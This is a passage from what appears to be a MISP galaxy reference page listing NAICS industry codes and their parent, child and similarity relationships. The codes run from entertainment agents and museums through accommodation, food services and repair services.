  • child-of: misp-galaxy:naics="7114" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="711410" with estimative-language:likelihood-probability="likely"

711410

Agents and Managers for Artists, Athletes, Entertainers, and Other Public Figures

The tag is: misp-galaxy:naics="711410"

711410 has relationships with:

  • child-of: misp-galaxy:naics="7114" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="71141" with estimative-language:likelihood-probability="likely"

7115

Independent Artists, Writers, and Performers

The tag is: misp-galaxy:naics="7115"

7115 has relationships with:

  • child-of: misp-galaxy:naics="711" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="71151" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="711510" with estimative-language:likelihood-probability="likely"

71151

Independent Artists, Writers, and Performers

The tag is: misp-galaxy:naics="71151"

71151 has relationships with:

  • child-of: misp-galaxy:naics="7115" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="711510" with estimative-language:likelihood-probability="likely"

711510

Independent Artists, Writers, and Performers

The tag is: misp-galaxy:naics="711510"

711510 has relationships with:

  • child-of: misp-galaxy:naics="7115" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="71151" with estimative-language:likelihood-probability="likely"

712

Museums, Historical Sites, and Similar Institutions

The tag is: misp-galaxy:naics="712"

712 has relationships with:

  • child-of: misp-galaxy:naics="71" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="7121" with estimative-language:likelihood-probability="likely"

7121

Museums, Historical Sites, and Similar Institutions

The tag is: misp-galaxy:naics="7121"

7121 has relationships with:

  • child-of: misp-galaxy:naics="712" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="71211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="712110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="71212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="712120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="71213" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="712130" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="71219" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="712190" with estimative-language:likelihood-probability="likely"

71211

Museums

The tag is: misp-galaxy:naics="71211"

71211 has relationships with:

  • child-of: misp-galaxy:naics="7121" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="712110" with estimative-language:likelihood-probability="likely"

712110

Museums

The tag is: misp-galaxy:naics="712110"

712110 has relationships with:

  • child-of: misp-galaxy:naics="7121" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="71211" with estimative-language:likelihood-probability="likely"

71212

Historical Sites

The tag is: misp-galaxy:naics="71212"

71212 has relationships with:

  • child-of: misp-galaxy:naics="7121" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="712120" with estimative-language:likelihood-probability="likely"

712120

Historical Sites

The tag is: misp-galaxy:naics="712120"

712120 has relationships with:

  • child-of: misp-galaxy:naics="7121" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="71212" with estimative-language:likelihood-probability="likely"

71213

Zoos and Botanical Gardens

The tag is: misp-galaxy:naics="71213"

71213 has relationships with:

  • child-of: misp-galaxy:naics="7121" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="712130" with estimative-language:likelihood-probability="likely"

712130

Zoos and Botanical Gardens

The tag is: misp-galaxy:naics="712130"

712130 has relationships with:

  • child-of: misp-galaxy:naics="7121" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="71213" with estimative-language:likelihood-probability="likely"

71219

Nature Parks and Other Similar Institutions

The tag is: misp-galaxy:naics="71219"

71219 has relationships with:

  • child-of: misp-galaxy:naics="7121" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="712190" with estimative-language:likelihood-probability="likely"

712190

Nature Parks and Other Similar Institutions

The tag is: misp-galaxy:naics="712190"

712190 has relationships with:

  • child-of: misp-galaxy:naics="7121" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="71219" with estimative-language:likelihood-probability="likely"

713

Amusement, Gambling, and Recreation Industries

The tag is: misp-galaxy:naics="713"

713 has relationships with:

  • child-of: misp-galaxy:naics="71" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="7131" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="7132" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="7139" with estimative-language:likelihood-probability="likely"

7131

Amusement Parks and Arcades

The tag is: misp-galaxy:naics="7131"

7131 has relationships with:

  • child-of: misp-galaxy:naics="713" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="71311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="713110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="71312" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="713120" with estimative-language:likelihood-probability="likely"

71311

Amusement and Theme Parks

The tag is: misp-galaxy:naics="71311"

71311 has relationships with:

  • child-of: misp-galaxy:naics="7131" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="713110" with estimative-language:likelihood-probability="likely"

713110

Amusement and Theme Parks

The tag is: misp-galaxy:naics="713110"

713110 has relationships with:

  • child-of: misp-galaxy:naics="7131" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="71311" with estimative-language:likelihood-probability="likely"

71312

Amusement Arcades

The tag is: misp-galaxy:naics="71312"

71312 has relationships with:

  • child-of: misp-galaxy:naics="7131" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="713120" with estimative-language:likelihood-probability="likely"

713120

Amusement Arcades

The tag is: misp-galaxy:naics="713120"

713120 has relationships with:

  • child-of: misp-galaxy:naics="7131" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="71312" with estimative-language:likelihood-probability="likely"

7132

Gambling Industries

The tag is: misp-galaxy:naics="7132"

7132 has relationships with:

  • child-of: misp-galaxy:naics="713" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="71321" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="713210" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="71329" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="713290" with estimative-language:likelihood-probability="likely"

71321

Casinos (except Casino Hotels)

The tag is: misp-galaxy:naics="71321"

71321 has relationships with:

  • child-of: misp-galaxy:naics="7132" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="713210" with estimative-language:likelihood-probability="likely"

713210

Casinos (except Casino Hotels)

The tag is: misp-galaxy:naics="713210"

713210 has relationships with:

  • child-of: misp-galaxy:naics="7132" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="71321" with estimative-language:likelihood-probability="likely"

71329

Other Gambling Industries

The tag is: misp-galaxy:naics="71329"

71329 has relationships with:

  • child-of: misp-galaxy:naics="7132" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="713290" with estimative-language:likelihood-probability="likely"

713290

Other Gambling Industries

The tag is: misp-galaxy:naics="713290"

713290 has relationships with:

  • child-of: misp-galaxy:naics="7132" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="71329" with estimative-language:likelihood-probability="likely"

7139

Other Amusement and Recreation Industries

The tag is: misp-galaxy:naics="7139"

7139 has relationships with:

  • child-of: misp-galaxy:naics="713" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="71391" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="713910" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="71392" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="713920" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="71393" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="713930" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="71394" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="713940" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="71395" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="713950" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="71399" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="713990" with estimative-language:likelihood-probability="likely"

71391

Golf Courses and Country Clubs

The tag is: misp-galaxy:naics="71391"

71391 has relationships with:

  • child-of: misp-galaxy:naics="7139" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="713910" with estimative-language:likelihood-probability="likely"

713910

Golf Courses and Country Clubs

The tag is: misp-galaxy:naics="713910"

713910 has relationships with:

  • child-of: misp-galaxy:naics="7139" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="71391" with estimative-language:likelihood-probability="likely"

71392

Skiing Facilities

The tag is: misp-galaxy:naics="71392"

71392 has relationships with:

  • child-of: misp-galaxy:naics="7139" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="713920" with estimative-language:likelihood-probability="likely"

713920

Skiing Facilities

The tag is: misp-galaxy:naics="713920"

713920 has relationships with:

  • child-of: misp-galaxy:naics="7139" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="71392" with estimative-language:likelihood-probability="likely"

71393

Marinas

The tag is: misp-galaxy:naics="71393"

71393 has relationships with:

  • child-of: misp-galaxy:naics="7139" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="713930" with estimative-language:likelihood-probability="likely"

713930

Marinas

The tag is: misp-galaxy:naics="713930"

713930 has relationships with:

  • child-of: misp-galaxy:naics="7139" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="71393" with estimative-language:likelihood-probability="likely"

71394

Fitness and Recreational Sports Centers

The tag is: misp-galaxy:naics="71394"

71394 has relationships with:

  • child-of: misp-galaxy:naics="7139" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="713940" with estimative-language:likelihood-probability="likely"

713940

Fitness and Recreational Sports Centers

The tag is: misp-galaxy:naics="713940"

713940 has relationships with:

  • child-of: misp-galaxy:naics="7139" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="71394" with estimative-language:likelihood-probability="likely"

71395

Bowling Centers

The tag is: misp-galaxy:naics="71395"

71395 has relationships with:

  • child-of: misp-galaxy:naics="7139" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="713950" with estimative-language:likelihood-probability="likely"

713950

Bowling Centers

The tag is: misp-galaxy:naics="713950"

713950 has relationships with:

  • child-of: misp-galaxy:naics="7139" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="71395" with estimative-language:likelihood-probability="likely"

71399

All Other Amusement and Recreation Industries

The tag is: misp-galaxy:naics="71399"

71399 has relationships with:

  • child-of: misp-galaxy:naics="7139" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="713990" with estimative-language:likelihood-probability="likely"

713990

All Other Amusement and Recreation Industries

The tag is: misp-galaxy:naics="713990"

713990 has relationships with:

  • child-of: misp-galaxy:naics="7139" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="71399" with estimative-language:likelihood-probability="likely"

72

Accommodation and Food Services

The tag is: misp-galaxy:naics="72"

72 has relationships with:

  • parent-of: misp-galaxy:naics="721" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="722" with estimative-language:likelihood-probability="likely"

721

Accommodation

The tag is: misp-galaxy:naics="721"

721 has relationships with:

  • child-of: misp-galaxy:naics="72" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="7211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="7212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="7213" with estimative-language:likelihood-probability="likely"

7211

Traveler Accommodation

The tag is: misp-galaxy:naics="7211"

7211 has relationships with:

  • child-of: misp-galaxy:naics="721" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="72111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="721110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="72112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="721120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="72119" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="721191" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="721199" with estimative-language:likelihood-probability="likely"

72111

Hotels (except Casino Hotels) and Motels

The tag is: misp-galaxy:naics="72111"

72111 has relationships with:

  • child-of: misp-galaxy:naics="7211" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="721110" with estimative-language:likelihood-probability="likely"

721110

Hotels (except Casino Hotels) and Motels

The tag is: misp-galaxy:naics="721110"

721110 has relationships with:

  • child-of: misp-galaxy:naics="7211" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="72111" with estimative-language:likelihood-probability="likely"

72112

Casino Hotels

The tag is: misp-galaxy:naics="72112"

72112 has relationships with:

  • child-of: misp-galaxy:naics="7211" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="721120" with estimative-language:likelihood-probability="likely"

721120

Casino Hotels

The tag is: misp-galaxy:naics="721120"

721120 has relationships with:

  • child-of: misp-galaxy:naics="7211" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="72112" with estimative-language:likelihood-probability="likely"

72119

Other Traveler Accommodation

The tag is: misp-galaxy:naics="72119"

72119 has relationships with:

  • child-of: misp-galaxy:naics="7211" with estimative-language:likelihood-probability="likely"

721191

Bed-and-Breakfast Inns

The tag is: misp-galaxy:naics="721191"

721191 has relationships with:

  • child-of: misp-galaxy:naics="7211" with estimative-language:likelihood-probability="likely"

721199

All Other Traveler Accommodation

The tag is: misp-galaxy:naics="721199"

721199 has relationships with:

  • child-of: misp-galaxy:naics="7211" with estimative-language:likelihood-probability="likely"

7212

RV (Recreational Vehicle) Parks and Recreational Camps

The tag is: misp-galaxy:naics="7212"

7212 has relationships with:

  • child-of: misp-galaxy:naics="721" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="72121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="721211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="721214" with estimative-language:likelihood-probability="likely"

72121

RV (Recreational Vehicle) Parks and Recreational Camps

The tag is: misp-galaxy:naics="72121"

72121 has relationships with:

  • child-of: misp-galaxy:naics="7212" with estimative-language:likelihood-probability="likely"

721211

RV (Recreational Vehicle) Parks and Campgrounds

The tag is: misp-galaxy:naics="721211"

721211 has relationships with:

  • child-of: misp-galaxy:naics="7212" with estimative-language:likelihood-probability="likely"

721214

Recreational and Vacation Camps (except Campgrounds)

The tag is: misp-galaxy:naics="721214"

721214 has relationships with:

  • child-of: misp-galaxy:naics="7212" with estimative-language:likelihood-probability="likely"

7213

Rooming and Boarding Houses, Dormitories, and Workers' Camps

The tag is: misp-galaxy:naics="7213"

7213 has relationships with:

  • child-of: misp-galaxy:naics="721" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="72131" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="721310" with estimative-language:likelihood-probability="likely"

72131

Rooming and Boarding Houses, Dormitories, and Workers' Camps

The tag is: misp-galaxy:naics="72131"

72131 has relationships with:

  • child-of: misp-galaxy:naics="7213" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="721310" with estimative-language:likelihood-probability="likely"

721310

Rooming and Boarding Houses, Dormitories, and Workers' Camps

The tag is: misp-galaxy:naics="721310"

721310 has relationships with:

  • child-of: misp-galaxy:naics="7213" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="72131" with estimative-language:likelihood-probability="likely"

722

Food Services and Drinking Places

The tag is: misp-galaxy:naics="722"

722 has relationships with:

  • child-of: misp-galaxy:naics="72" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="7223" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="7224" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="7225" with estimative-language:likelihood-probability="likely"

7223

Special Food Services

The tag is: misp-galaxy:naics="7223"

7223 has relationships with:

  • child-of: misp-galaxy:naics="722" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="72231" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="722310" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="72232" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="722320" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="72233" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="722330" with estimative-language:likelihood-probability="likely"

72231

Food Service Contractors

The tag is: misp-galaxy:naics="72231"

72231 has relationships with:

  • child-of: misp-galaxy:naics="7223" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="722310" with estimative-language:likelihood-probability="likely"

722310

Food Service Contractors

The tag is: misp-galaxy:naics="722310"

722310 has relationships with:

  • child-of: misp-galaxy:naics="7223" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="72231" with estimative-language:likelihood-probability="likely"

72232

Caterers

The tag is: misp-galaxy:naics="72232"

72232 has relationships with:

  • child-of: misp-galaxy:naics="7223" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="722320" with estimative-language:likelihood-probability="likely"

722320

Caterers

The tag is: misp-galaxy:naics="722320"

722320 has relationships with:

  • child-of: misp-galaxy:naics="7223" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="72232" with estimative-language:likelihood-probability="likely"

72233

Mobile Food Services

The tag is: misp-galaxy:naics="72233"

72233 has relationships with:

  • child-of: misp-galaxy:naics="7223" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="722330" with estimative-language:likelihood-probability="likely"

722330

Mobile Food Services

The tag is: misp-galaxy:naics="722330"

722330 has relationships with:

  • child-of: misp-galaxy:naics="7223" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="72233" with estimative-language:likelihood-probability="likely"

7224

Drinking Places (Alcoholic Beverages)

The tag is: misp-galaxy:naics="7224"

7224 has relationships with:

  • child-of: misp-galaxy:naics="722" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="72241" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="722410" with estimative-language:likelihood-probability="likely"

72241

Drinking Places (Alcoholic Beverages)

The tag is: misp-galaxy:naics="72241"

72241 has relationships with:

  • child-of: misp-galaxy:naics="7224" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="722410" with estimative-language:likelihood-probability="likely"

722410

Drinking Places (Alcoholic Beverages)

The tag is: misp-galaxy:naics="722410"

722410 has relationships with:

  • child-of: misp-galaxy:naics="7224" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="72241" with estimative-language:likelihood-probability="likely"

7225

Restaurants and Other Eating Places

The tag is: misp-galaxy:naics="7225"

7225 has relationships with:

  • child-of: misp-galaxy:naics="722" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="72251" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="722511" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="722513" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="722514" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="722515" with estimative-language:likelihood-probability="likely"

72251

Restaurants and Other Eating Places

The tag is: misp-galaxy:naics="72251"

72251 has relationships with:

  • child-of: misp-galaxy:naics="7225" with estimative-language:likelihood-probability="likely"

722511

Full-Service Restaurants

The tag is: misp-galaxy:naics="722511"

722511 has relationships with:

  • child-of: misp-galaxy:naics="7225" with estimative-language:likelihood-probability="likely"

722513

Limited-Service Restaurants

The tag is: misp-galaxy:naics="722513"

722513 has relationships with:

  • child-of: misp-galaxy:naics="7225" with estimative-language:likelihood-probability="likely"

722514

Cafeterias, Grill Buffets, and Buffets

The tag is: misp-galaxy:naics="722514"

722514 has relationships with:

  • child-of: misp-galaxy:naics="7225" with estimative-language:likelihood-probability="likely"

722515

Snack and Nonalcoholic Beverage Bars

The tag is: misp-galaxy:naics="722515"

722515 has relationships with:

  • child-of: misp-galaxy:naics="7225" with estimative-language:likelihood-probability="likely"

81

Other Services (except Public Administration)

The tag is: misp-galaxy:naics="81"

81 has relationships with:

  • parent-of: misp-galaxy:naics="811" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="812" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="813" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="814" with estimative-language:likelihood-probability="likely"

811

Repair and Maintenance

The tag is: misp-galaxy:naics="811"

811 has relationships with:

  • child-of: misp-galaxy:naics="81" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="8111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="8112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="8113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="8114" with estimative-language:likelihood-probability="likely"

8111

Automotive Repair and Maintenance

The tag is: misp-galaxy:naics="8111"

8111 has relationships with:

  • child-of: misp-galaxy:naics="811" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="811111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="811114" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="811121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="811122" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81119" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="811191" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="811192" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="811198" with estimative-language:likelihood-probability="likely"

81111

Automotive Mechanical and Electrical Repair and Maintenance

The tag is: misp-galaxy:naics="81111"

81111 has relationships with:

  • child-of: misp-galaxy:naics="8111" with estimative-language:likelihood-probability="likely"

811111

General Automotive Repair

The tag is: misp-galaxy:naics="811111"

811111 has relationships with:

  • child-of: misp-galaxy:naics="8111" with estimative-language:likelihood-probability="likely"

811114

Specialized Automotive Repair

The tag is: misp-galaxy:naics="811114"

811114 has relationships with:

  • child-of: misp-galaxy:naics="8111" with estimative-language:likelihood-probability="likely"

81112

Automotive Body, Paint, Interior, and Glass Repair

The tag is: misp-galaxy:naics="81112"

81112 has relationships with:

  • child-of: misp-galaxy:naics="8111" with estimative-language:likelihood-probability="likely"

811121

Automotive Body, Paint, and Interior Repair and Maintenance

The tag is: misp-galaxy:naics="811121"

811121 has relationships with:

  • child-of: misp-galaxy:naics="8111" with estimative-language:likelihood-probability="likely"

811122

Automotive Glass Replacement Shops

The tag is: misp-galaxy:naics="811122"

811122 has relationships with:

  • child-of: misp-galaxy:naics="8111" with estimative-language:likelihood-probability="likely"

81119

Other Automotive Repair and Maintenance

The tag is: misp-galaxy:naics="81119"

81119 has relationships with:

  • child-of: misp-galaxy:naics="8111" with estimative-language:likelihood-probability="likely"

811191

Automotive Oil Change and Lubrication Shops

The tag is: misp-galaxy:naics="811191"

811191 has relationships with:

  • child-of: misp-galaxy:naics="8111" with estimative-language:likelihood-probability="likely"

811192

Car Washes

The tag is: misp-galaxy:naics="811192"

811192 has relationships with:

  • child-of: misp-galaxy:naics="8111" with estimative-language:likelihood-probability="likely"

811198

All Other Automotive Repair and Maintenance

The tag is: misp-galaxy:naics="811198"

811198 has relationships with:

  • child-of: misp-galaxy:naics="8111" with estimative-language:likelihood-probability="likely"

8112

Electronic and Precision Equipment Repair and Maintenance

The tag is: misp-galaxy:naics="8112"

8112 has relationships with:

  • child-of: misp-galaxy:naics="811" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="811210" with estimative-language:likelihood-probability="likely"

81121

Electronic and Precision Equipment Repair and Maintenance

The tag is: misp-galaxy:naics="81121"

81121 has relationships with:

  • child-of: misp-galaxy:naics="8112" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="811210" with estimative-language:likelihood-probability="likely"

811210

Electronic and Precision Equipment Repair and Maintenance

The tag is: misp-galaxy:naics="811210"

811210 has relationships with:

  • child-of: misp-galaxy:naics="8112" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="81121" with estimative-language:likelihood-probability="likely"

8113

Commercial and Industrial Machinery and Equipment (except Automotive and Electronic) Repair and Maintenance

The tag is: misp-galaxy:naics="8113"

8113 has relationships with:

  • child-of: misp-galaxy:naics="811" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81131" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="811310" with estimative-language:likelihood-probability="likely"

81131

Commercial and Industrial Machinery and Equipment (except Automotive and Electronic) Repair and Maintenance

The tag is: misp-galaxy:naics="81131"

81131 has relationships with:

  • child-of: misp-galaxy:naics="8113" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="811310" with estimative-language:likelihood-probability="likely"

811310

Commercial and Industrial Machinery and Equipment (except Automotive and Electronic) Repair and Maintenance

The tag is: misp-galaxy:naics="811310"

811310 has relationships with:

  • child-of: misp-galaxy:naics="8113" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="81131" with estimative-language:likelihood-probability="likely"

8114

Personal and Household Goods Repair and Maintenance

The tag is: misp-galaxy:naics="8114"

8114 has relationships with:

  • child-of: misp-galaxy:naics="811" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81141" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="811411" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="811412" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81142" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="811420" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81143" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="811430" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="81149" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="811490" with estimative-language:likelihood-probability="likely"

81141

Home and Garden Equipment and Appliance Repair and Maintenance

The tag is: misp-galaxy:naics="81141"

81141 has relationships with:

  • child-of: misp-galaxy:naics="8114" with estimative-language:likelihood-probability="likely"

811411

Home and Garden Equipment Repair and Maintenance

The tag is: misp-galaxy:naics="811411"

811411 has relationships with:

  • child-of: misp-galaxy:naics="8114" with estimative-language:likelihood-probability="likely"

811412

Appliance Repair and Maintenance

The tag is: misp-galaxy:naics="811412"

811412 has relationships with:

  • child-of: misp-galaxy:naics="8114" with estimative-language:likelihood-probability="likely"

81142

Reupholstery and Furniture Repair

The tag is: misp-galaxy:naics="81142"

81142 has relationships with:

  • child-of: misp-galaxy:naics="8114" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="811420" with estimative-language:likelihood-probability="likely"

811420

Reupholstery and Furniture Repair

The tag is: misp-galaxy:naics="811420"

811420 has relationships with:

  • child-of: misp-galaxy:naics="8114" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="81142" with estimative-language:likelihood-probability="likely"

81143

Footwear and Leather Goods Repair

The tag is: misp-galaxy:naics="81143"

81143 has relationships with:

  • child-of: misp-galaxy:naics="8114" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="811430" with estimative-language:likelihood-probability="likely"

811430

Footwear and Leather Goods Repair

The tag is: misp-galaxy:naics="811430"

811430 has relationships with:

  • child-of: misp-galaxy:naics="8114" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="81143" with estimative-language:likelihood-probability="likely"

81149

Other Personal and Household Goods Repair and Maintenance

The tag is: misp-galaxy:naics="81149"

81149 has relationships with:

  • child-of: misp-galaxy:naics="8114" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="811490" with estimative-language:likelihood-probability="likely"

811490

Other Personal and Household Goods Repair and Maintenance

The tag is: misp-galaxy:naics="811490"

811490 has relationships with:

  • child-of: misp-galaxy:naics="8114" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="81149" with estimative-language:likelihood-probability="likely"

812

Personal and Laundry Services

The tag is: misp-galaxy:naics="812"

812 has relationships with:

  • child-of: misp-galaxy:naics="81" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="8121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="8122" with estimative-language:likelihood-probability="likely"

